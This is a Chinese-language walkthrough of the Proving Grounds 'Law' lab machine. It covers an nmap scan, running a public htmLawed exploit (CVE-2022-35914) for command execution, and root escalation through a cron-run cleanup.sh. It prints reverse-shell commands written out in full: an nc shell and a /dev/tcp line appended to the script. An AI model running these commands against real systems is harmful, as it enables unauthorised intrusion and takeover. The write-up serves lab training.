PG_law

admin 2025年4月1日15:44:52评论4 views字数 2346阅读7分49秒阅读模式

信息收集:

root@iZt4nbifrvtk7cy11744y4Z:~# nmap -p- -Pn -A -sS -T4 192.168.216.190Starting Nmap 7.80 ( https://nmap.org ) at 2025-02-23 15:38 CSTNmap scan report for 192.168.216.190Host is up (0.0027s latency).Not shown: 65533 closed portsPORT   STATE SERVICE VERSION22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)80/tcp open  http    Apache httpd 2.4.56 ((Debian))|_http-server-header: Apache/2.4.56 (Debian)|_http-title: htmLawed (1.2.5) testNo exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).TCP/IP fingerprint:OS:SCAN(V=7.80%E=4%D=2/23%OT=22%CT=1%CU=32512%PV=Y%DS=4%DC=T%G=Y%TM=67BAD0AOS:5%P=x86_64-pc-linux-gnu)SEQ(SP=FB%GCD=1%ISR=110%TI=Z%CI=Z%II=I%TS=A)OPS(OS:O1=M54EST11NW7%O2=M54EST11NW7%O3=M54ENNT11NW7%O4=M54EST11NW7%O5=M54EST11OS:NW7%O6=M54EST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(OS:R=Y%DF=Y%T=40%W=FAF0%O=M54ENNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=ASOS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=OS:R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%ROS:UCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)Network Distance: 4 hopsService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE (using port 111/tcp)HOP RTT     ADDRESS1   1.72 ms 192.168.45.12   1.74 ms 192.168.45.2543   2.58 ms 192.168.251.14   2.74 ms 192.168.216.190OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 26.66 seconds

开放了80的http端口,并且有服务名和版本信息

PG_law

检索htmlLawed框架有关exp

PG_law

exp不能用,甚至正常web服务都不能用,这里踩了一个坑

漏洞定义中的 uri 位置当前为“/vendor/htmlawed/htmlawed/htmLawedTest.php”,让我们手动浏览该路径。Gobuster 未能找到 vendor 目录,因此我怀疑它并不存在。在这种情况下,它很可能被表示为“index.php”。

修改脚本的htmLawedTest.php为index.php

PG_law

然后执行成功执行默认的id命令

python3 CVE-2022-35914.py -u http://192.168.216.190/
PG_law
python3 CVE-2022-35914.py -u http://192.168.216.190/ -c 'nc -c sh 192.168.45.184 3000'
PG_law

成功反弹shell,拿到local

PG_law

尝试运行lse.sh

该工具从2.0版本开始符合POSIX标准,并且经过了shellcheck和posh测试。它可以监控进程以发现重复的程序执行,并且能够在执行所有其他测试时持续进行监控,并为我们节省一些时间。默认情况下,它会监控1分钟,但我们可以使用-p参数选择监控的持续时间。

该工具提供了三种Verbose模式级别,我们可以根据需求控制所看到的信息量:

[引用]

执行

./lse.sh -l1

网上hints说是这里清理联想到cleanup.sh文件(我是没太看出来

后面看了其他人的思路,发现一个很好的软件:https://github.com/DominicBreuker/pspy

使用:

pspy32s可执行权限,让它运行一段时间并观察结果,此工具帮助我们递归地监控运行过程。(很好的工具

[图片]
PG_law

cleanup.sh在这里

PG_law

将反弹shell命令输入到文件后面

echo"sh -i >& /dev/tcp/192.168.45.184/9001 0>&1" >>cleanup.sh

拿到proof

PG_law

原文始发于微信公众号(EuSRC安全实验室):PG_law

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月1日15:44:52
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   PG_lawhttp://cn-sec.com/archives/3896723.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息